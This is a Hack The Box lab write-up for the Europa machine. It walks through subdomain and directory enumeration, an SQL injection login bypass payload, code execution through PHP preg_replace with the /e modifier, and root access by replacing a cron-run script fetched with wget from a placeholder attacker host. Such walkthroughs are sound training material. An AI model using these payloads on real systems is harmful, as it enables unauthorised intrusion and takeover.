HTB Europa (Medium) - Writeup
Difficulty: Medium
Bypassed login page via SQL injection, allowing admin access.
Discovered a vulnerable OpenVPN config generator abusing preg_replace() with the /e modifier for RCE.
Gained a reverse shell using a crafted payload in the ipaddress parameter.
Escalated to root by placing a malicious script in a writable cron-executed directory.
Nmap
The nmap scan revealed three open ports:
Port 80 - Default apache
It’s running default apache page:
Let’s go to https
Port 443 - https website
Site’s certificates revealed some subdomains:
- admin-portal.europacorp.htb
- www.europacorp.htb
- europacorp.htb
We’ll add them to /etc/hosts
admin-portal.europacorp.htb contains login page:
We can try discoevring other subdomains:
wfuzz -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u https://admin-portal.europacorp.htb -H "Host: FUZZ.europacorp.htb" --hw 1049
It didn’t found anything new.
We’ll now run directory busting against login page, we know that it uses php so we’ll add php extension:
feroxbuster --url https://admin-portal.europacorp.htb/ -x php -k
There are some intresting files like db.php but we can’t view them without any type of LFI or similar.
/logs and /data returns forbidden access.
SQLi - authentication bypass
We can catch login request with burpsuite and add a single quote to username.
It returns an error which is a good sign of possible sqli vulnerability:
The one bypass technique that worked was using valid username and then commenting out the rest:
admin@europacorp.htb'-- -
It will check if user is valid and then cancel checking if password is valid:
The query that is vulnerable to this bypass looks like this:
SELECT * FROM users WHERE email='$email' and password='$password_hash';
We’re logged in!
Abusing tools.php
There is a tool - openvpn config generator
Located in /tools.php directory.
Let’s take a look at this request with burpsuite:
It takes three parameters:
- pattern
- ipaddress
- text
pattern has the value /ip_address/, which looks like a regex.
In php to do a regex one of the preg_ family functions is used.
We are able to input ip address once but it gets replaced a few times in final config file.
It most likely uses preg_replace to do that.
It is one of the dangerous php functions that allows us to execute php code.
I recommend reading this article to understand how it works:
https://captainnoob.medium.com/command-execution-preg-replace-php-function-exploit-62d6f746bda4
If we add “e” modifier in the pattern we will be able to execute code.
Let’s take a look at article’s exploitation example:
When done it looks something like that:
- preg_replace(/a/e, system(“id”), a)
Let’s try it:
It works!, now we need to put reverse shell there:
And we get a connection back:
Priv Esc to root
First thing I checked was db.php:
Mysql didn’t reveal anything new.
The vulnerable query that allowed authentication bypass was:
There is also a script called clearlogs:
This script is likely executed by a cron job to regularly clear the logs.
With pspy64 we can verify if it’s running as a cronjob:
It does run as cron job:
- /usr/bin/php /var/www/cronjobs/clearlogs
- /bin/sh -c /var/www/cronjobs/clearlogs
There is a line in this file that is very intresting:
- exec(‘/var/www/cmd/logcleared.sh’);
It turns out that we own /var/www/cmd directory.
All we need to do now is to change logcleared.sh
wget http://<attacker ip>/logcleared.sh
Now start a listener and wait for it to execute.
After that we can retrieve both flags:
Thank you for reading!!